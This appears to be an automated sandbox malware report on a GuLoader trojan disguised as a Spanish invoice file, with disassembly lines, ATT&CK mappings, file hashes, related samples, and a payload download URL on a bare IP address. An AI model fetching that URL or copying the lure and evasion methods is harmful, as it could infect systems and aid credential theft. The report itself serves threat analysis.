      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325116CF mov eax, dword ptr fs:[00000030h]3_2_325116CF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F6C7 mov eax, dword ptr fs:[00000030h]3_2_3259F6C7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259D6F0 mov eax, dword ptr fs:[00000030h]3_2_3259D6F0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D6E0 mov eax, dword ptr fs:[00000030h]3_2_3250D6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D6E0 mov eax, dword ptr fs:[00000030h]3_2_3250D6E0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325736EE mov eax, dword ptr fs:[00000030h]3_2_325736EE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325136EF mov eax, dword ptr fs:[00000030h]3_2_325136EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256368C mov eax, dword ptr fs:[00000030h]3_2_3256368C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD6AA mov eax, dword ptr fs:[00000030h]3_2_324DD6AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD6AA mov eax, dword ptr fs:[00000030h]3_2_324DD6AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D76B2 mov eax, dword ptr fs:[00000030h]3_2_324D76B2
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258375F mov eax, dword ptr fs:[00000030h]3_2_3258375F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3740 mov eax, dword ptr fs:[00000030h]3_2_324F3740
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B3749 mov eax, dword ptr fs:[00000030h]3_2_325B3749
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB765 mov eax, dword ptr fs:[00000030h]3_2_324DB765
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5702 mov eax, dword ptr fs:[00000030h]3_2_324E5702
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5702 mov eax, dword ptr fs:[00000030h]3_2_324E5702
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7703 mov eax, dword ptr fs:[00000030h]3_2_324E7703
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F71F mov eax, dword ptr fs:[00000030h]3_2_3251F71F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F71F mov eax, dword ptr fs:[00000030h]3_2_3251F71F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515734 mov eax, dword ptr fs:[00000030h]3_2_32515734
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325BB73C mov eax, dword ptr fs:[00000030h]3_2_325BB73C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3720 mov eax, dword ptr fs:[00000030h]3_2_324E3720
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004036D7 EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, DeleteFileW, lstrcatW, lstrcatW, lstrcatW, lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, LdrInitializeThunk, CopyFileW, CloseHandle, OleUninitialize, ExitProcess, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, 0_2_004036D7

      Stealing of Sensitive Information

      Source: Yara match File source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara matchFile source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      2
      Virtualization/Sandbox Evasion
      OS Credential Dumping221
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      1
      Access Token Manipulation
      LSASS Memory2
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      11
      Process Injection
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture11
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Source | Detection | Scanner | Label
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | 56% | Virustotal |
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | 42% | ReversingLabs | Win32.Trojan.Guloader
      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\nsnC132.tmp\LangDLL.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | 0% | ReversingLabs |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binm | 0% | Avira URL Cloud | safe
      http://www.ftp.ftp://ftp.gopher. | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin | 0% | Avira URL Cloud | safe
      http://nsis.sf.net/NSIS_Error... | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binT | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binDfNN | 0% | Avira URL Cloud | safe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binY | 0% | Avira URL Cloud | safe
      No contacted domains info
      Name | Malicious | Antivirus Detection | Reputation
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin | false | Avira URL Cloud: safe | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binm | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.ftp.ftp://ftp.gopher. | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
      http://nsis.sf.net/NSIS_Error... | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | false | Avira URL Cloud: safe | unknown
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binT | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binDfNN | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binY | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp | false | | high
            IP | Domain | Country | ASN | ASN Name | Malicious
            212.162.149.153 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | false
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1587320
            Start date and time:2025-01-10 07:04:12 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 53s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:5
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
            Detection:MAL
            Classification:mal76.troj.evad.winEXE@3/6@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 88%
            • Number of executed functions: 46
            • Number of non-executed functions: 302
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            Time | Type | Description
            01:05:32 | API Interceptor | 3x Sleep call for process: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe modified
            No context
            No context
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            UNREAL-SERVERSUS | rArz0wnYVU.exe | malicious | GuLoader | 212.162.149.94
            UNREAL-SERVERSUS | rArz0wnYVU.exe | malicious | GuLoader | 212.162.149.94
            UNREAL-SERVERSUS | RFQ NO 65-58003.exe | malicious | Remcos | 212.162.149.92
            UNREAL-SERVERSUS | Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 162.251.122.87
            UNREAL-SERVERSUS | Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 162.251.122.87
            UNREAL-SERVERSUS | Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 162.251.122.87
            UNREAL-SERVERSUS | WO-663071 Sabiya Power Station Project.vbs | malicious | Remcos | 162.251.122.87
            UNREAL-SERVERSUS | RFQ 008191.exe | malicious | Remcos, GuLoader | 212.162.149.89
            UNREAL-SERVERSUS | purchase.order.exe | malicious | FormBook, GuLoader | 212.162.149.66
            UNREAL-SERVERSUS | Forhandlingsfriheden.exe | malicious | FormBook, GuLoader | 212.162.149.66
            No context
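            Match | Associated Sample Name / URL | Detection | Threat Name
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | EL378_SPEC.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | EL378_SPEC.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | DHL_INVOICE.exe | malicious | GuLoader, Lokibot
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | DHL_#U53d1#U7968.exe | malicious | GuLoader, Lokibot
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | DHL_INVOICE.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | DHL_#U53d1#U7968.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | Ta62k9weDV.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | Ta62k9weDV.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | HF-2209869481.exe | malicious | GuLoader
            C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll | HF-2209869481.exe | malicious | GuLoader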
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):298979
                                Entropy (8bit):7.586687461235365
                                Encrypted:false
                                SSDEEP:6144:b0AmmTjA0ppG2c3blFuFuxf0DaPN5ug3yzP:LmmTjxbG2CbHu/+V5v3y7
                                MD5:45893409E37B0F5E8F052154BF1662E9
                                SHA1:5CE2184F0675DD5FAE184B4E8F6264AD72ACDCF3
                                SHA-256:635325D683AF6AAAFB256FF4D53A121B6A3C1465B2BC19010D881700BFA7EA56
                                SHA-512:621D6910CE1B8D3740571D144E40B83DD523693513BB45F01E81BF72CED1165510440002189FD2084EECA9AA703B8D95BEC0BFFD62ABED4E33319FF7A0FF9F8D
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):225235
                                Entropy (8bit):1.2505494983045329
                                Encrypted:false
                                SSDEEP:768:/RwMidX4Q904QeKbFSmjFFrFbCgq4ONJx22YjLusudtedqLIkvO6KdE3r/s4qVZ0:8tsFB+d3KLd1JA37H
                                MD5:6883695B7EE87239D1031F25CB022A43
                                SHA1:4ECA46FA3848E24D7FDD7B79AED8742A58750497
                                SHA-256:8E6299FABA71898C9DB184D0B04DB12307531F61D8B40A12EA436E18F181AA43
                                SHA-512:E2894F566FE1A61DEAEBB081C9452B0E7BB72C7EF5A1E80E0D5C9F74175DB8FAFD461FD3B5B9083153EF5C0FA6D18F10112B03E3966722026C3A1BE5346965FA
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):103368
                                Entropy (8bit):2.6625379092327504
                                Encrypted:false
                                SSDEEP:1536:puAH3GNT2ANNoOWNDtT4UgygquQxv2F4MxDj17Ya/irUJuCvpw:pPkC
                                MD5:A0C3222C6706A6C067303C48A4D936E8
                                SHA1:C15C057DCC249E7C7568EDC30154E89AFB82333D
                                SHA-256:E3066014493AE763047168EBD753EF32C2C03F732FA3BEA8F5CEB2C53F196B0C
                                SHA-512:F02769D95CCC232AEF1A0656564FA6055F91FC2A0EED8F383B0E663B5507C7BF8D59B95FFDFA505BAE5945C7A2E8B3C5964ED3A167EA6E65EA80948CDAA57CD9
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):314272
                                Entropy (8bit):1.2593509662318005
                                Encrypted:false
                                SSDEEP:768:fBqB1CAi48on0XydRS4Jbu2SnQ0bR7NZWfw/EIn5D6POQLxALEmpembXYqSxVil5:Z0/0mnzQ3hWdXjGVJ+xajqazD
                                MD5:C7D83B1354B58B52F3EEEB0D54AE8051
                                SHA1:D58F01E64AC4AFE927668F75042DC99A01FC8B26
                                SHA-256:4DE62E400FD03ED1A45A9F90DF6B155F313BD15C2876B0B0AD64E7AA7BBBE12C
                                SHA-512:96801C502EA4E67DFC8380C789DA84307A261F4FBBD2D8ACCF56E95919B63CC7E89D00FADB32C7F95CD1CD75BDBCBC01FF0EC81214587E084726828C974511D7
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):5120
                                Entropy (8bit):4.289419438668023
                                Encrypted:false
                                SSDEEP:48:qbrtDVP10LgQL8QRU8IlmWm7WmnuWK8hSemoMqG5QEv8sF9U3ofMU:UVPFQIqlemWm7WmTaehG+EkR
                                MD5:E459F344B4A47AF2CF15D821F3946724
                                SHA1:5DF805FCF0A857B98CECCA139B2EA99979C8F01E
                                SHA-256:F4778B8ACA1EB5D93D267468589B4BF45B827A50300EB552D796E9DC22ADE419
                                SHA-512:5B8285A166404C73869D5AAA25C5AF3544AB4A2F012C5EA1E12B04A1D6FA3D32B4A6857E9FD29DD3C86DD5DC8111E3E86DE11BDB5496C1C527FF1BC91BD791BB
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):12288
                                Entropy (8bit):5.974444797015433
                                Encrypted:false
                                SSDEEP:192:U4A1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6gn9Mw:UYR7SrtTv53tdtTgwF4SQbGPX36g9Mw
                                MD5:637E1FA13012A78922B6E98EFC0B12E2
                                SHA1:8012D44E42CD6D813EA63D5CCBF190FE72E3C778
                                SHA-256:703E17D30A91775F8DDC2648B537FC846FAD6415589A503A4529C36F60A17439
                                SHA-512:932ED6A52E89C4FA587A7C0C3903D69CF89A32DBD46ED8DCB251ABB6C15192D92B1F624C31F0E4BD3E9BF95FC1A55FDB7CEE9DD668E1B4F22DDB95786C063E96
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                                • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                                • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                                • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                                • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                                • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                                • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                                • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                                • Filename: HF-2209869481.exe, Detection: malicious, Browse
                                • Filename: HF-2209869481.exe, Detection: malicious, Browse
                                Reputation:moderate, very likely benign file
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.6229397457593615
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                File size:533'960 bytes
                                MD5:4f2c796aebd02a54ca9bebb0c5bc5ef0
                                SHA1:558e2f3de9077aaf9159c4fb1633d66c75b14dda
                                SHA256:c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692
                                SHA512:8eb1daf79455c75dba4521196c8ef468184f1a0d2c385bd424c4ce82174fe8c2970a47d72fc7d83c444629a236e373a70fb1d3cee236cfff246dba4b8ceb48c7
                                SSDEEP:12288:rRfrRAA+3hDCYCCslgEzlaGuZHStFIH/x5eWJe5:dfNAAmhBCCsRzeRCFoewe5
                                TLSH:6CB402259B4DCC12E4B514BCE732AACAF4FCBD53966A9613F3103E2B857CB819E0D151
                                Icon Hash:5b797d7d8d11592d
                                Entrypoint:0x4036d7
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x63132B84 [Sat Sep 3 10:25:08 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                Signature Valid:false
                                Signature Issuer:CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                Error Number:-2146762487
                                Not Before, Not After
                                • 23/03/2024 08:06:38 23/03/2025 08:06:38
                                Subject Chain
                                • CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                                Version:3
                                Thumbprint MD5:F258822B369D369853552E5A72A06C88
                                Thumbprint SHA-1:36E3DCA8400E4D266774CF32D7E5D6D9C2D2E757
                                Thumbprint SHA-256:CB63044CE9D8355C6518EC29E162D6431C74555D2F0496577D9F2F83BFC6150F
                                Serial:0FEFB9AC4FE7B58D3E3EC15139BA5132C65A25C4
                                Instruction
                                sub esp, 000003ECh
                                push ebx
                                push ebp
                                push esi
                                push edi
                                xor ebx, ebx
                                mov edi, 00408528h
                                push 00008001h
                                mov dword ptr [esp+14h], ebx
                                mov ebp, ebx
                                call dword ptr [00408170h]
                                mov esi, dword ptr [004080ACh]
                                lea eax, dword ptr [esp+2Ch]
                                xorps xmm0, xmm0
                                mov dword ptr [esp+40h], ebx
                                push eax
                                movlpd qword ptr [esp+00000144h], xmm0
                                mov dword ptr [esp+30h], 0000011Ch
                                call esi
                                test eax, eax
                                jne 00007F8EC0B62ED9h
                                lea eax, dword ptr [esp+2Ch]
                                mov dword ptr [esp+2Ch], 00000114h
                                push eax
                                call esi
